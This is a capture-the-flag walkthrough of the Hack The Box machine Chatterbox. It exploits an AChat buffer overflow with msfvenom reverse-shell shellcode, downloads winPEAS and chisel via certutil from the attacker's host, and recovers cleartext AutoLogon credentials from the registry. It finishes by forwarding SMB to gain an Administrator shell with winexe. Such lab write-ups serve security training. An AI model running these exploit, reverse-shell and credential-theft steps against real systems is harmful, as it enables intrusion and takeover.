HTB:Chatterbox Walkthrough
Truth be told, the more Windows boxes you pwn, the lesser you will hate it.
Scan — NMAP
sudo nmap -sC -sV -Pn -O -p- -oN nmap-basic-tcp 10.10.10.74
Note: This scan took a while to complete. Go grab a coffee and some snacks while it runs 😉
Two open ports — 9255 and 9256. Both belong to the AChat service system.
I’m not familiar with this service so I went out to Google to look for vulnerabilities. We don’t have a version number either, so it was just wild guessing at this point.
Enum — AChat
Searchsploit had some results.
searchsploit achat
A remote buffer overflow that will give us RCE on the box!
Copy the exploit to current working directory. We then have to make some modifications to the script.
searchsploit -m 36025
Checking out the script, it is clear that we need to generate new shellcode customized to our requirements. Since msfvenom will give us the the opcode values exactly as used in the script, we only have to remove the existing values and plug in the new ones.
Generate shellcode.
sudo msfvenom -a x86 — platform Windows -p windows/shell_reverse_tcp LHOST=<kali-ip-on-vpn> LPORT=4444 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
It’s nice to see that the author of this exploit has already added the bad characters in the command :)
Copy and baste the buf values into the script replacing the existing ones. Change the server_address variable.
server_address = (‘10.10.10.74’, 9256)
Foothold
Open a netcat listener on port 4444.
nc -nlvp 4444
Run the exploit.
python 36025.py
Capture the shell.
Grab the user flag!
Privilege Escalation
Some system enumeration before we jump into it.
C:\Windows\system32>systeminfo
Time to run some enumeration scripts 😏
Enumeration pt. 2
I love the PEASS-ng project and so will you! The single most useful enumeration tool I’ve used ’til date!
If you’re new to it, git clone the project and extract the winPEAS binary.
From the system information, we know that Chatterbox is a 32-bit Windows PC.
Open a python server in the same directory as the winPEASx86.exe binary.
If you’re having trouble finding it, just run locate winPEASx86.
python -m SimpleHTTPServer 9005
Download the tool onto Chatterbox. Make sure you have permissions to write files in that directory first.
For example, Alfred user will have permissions to write files only in their home folder.
Then, run the executable.
C:\Windows\system32>cd C:\Users\Alfred
C:\Users\Alfred\Desktop>certutil -urlcache -split -f http://<kali-ip-on-vpn>:9005/winPEASx86.exe winPEASx86.exe
C:\Users\Alfred\Desktop>winPEASx86.exe
After a while of perusing through the results, I noticed this:
AutoLogon credentials — nice! This means that the registry is storing cleartext credentials.
If you’re curious about what picked it up, check this command out:
C:\Users\Alfred\Desktop>reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
For more such clean tricks, check out this priv-esc guide!
Now that we have a set of credentials (Alfred:Welcome1!) that will sign us in as Administrator, we need to find places we can use this.
This part of the winPEAS output shows that SMB is running as an internal service. Which is why NMAP didn’t pick it up.
SMB can be used to escalate current privileges.
But to connect to it, we need to use port-forwarding.
Port-forwarding is a technique that is used to map a local port to a remote service. We can employ this method to map port 445 on Kali to the SMB service running on Chatterbox. This way, when we engage with port 445 locally, the requests will be forwarded to Chatterbox.
If that confused you ….. well, at least I tried 😓
Port-forwarding using Chisel
Chisel is a very popular and easy-to-use port-forwarding tool.
Check out this guide by 0xdf for more clarity.
Get the 64-bit Linux version and the 32-bit windows version from the GitHub page.
On Kali, open a Chisel server and route via port 1337.
(Sudo because we want to forward on port 445 locally)
sudo ./chisel_1.7.6_linux_amd64 server -p 1337 — reverse
Now on Chatterbox, download the 32-bit chisel and run. (You need to open a python server to serve it from the directory where you downloaded Chisel. Just like we did with winPEASx86.exe)
certutil -urlcache -split -f http://<kali-ip-on-vpn>:9005/chisel_1.7.6_windows_386 chisel.exe
chisel.exe client <kali-ip-on-vpn>:1337 R:445:127.0.0.1:445
Check if the port is listening on Kali:
netstat -ano | grep 445
Use winexe to run command on the target via SMB, logging in as the administrator.
Winexe is one of the many tools we can use to run commands remotely on Windows systems.
Install: sudo apt-get install winexe
winexe -U Administrator%Welcome1! //127.0.0.1 “cmd.exe”
Remember that we can access port 445 on Chatterbox like it is a local service because of port-forwarding. Hence, the sharename of 127.0.0.1.
And that’s as good as it gets, folks!
Rooted 😁
Grab the root flag!
References
- Since this write-up was done as part of TCM’s Windows PrivEsc course, credits to Heath Adams ❤
- https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
- All in-line links mentioned in the write-up.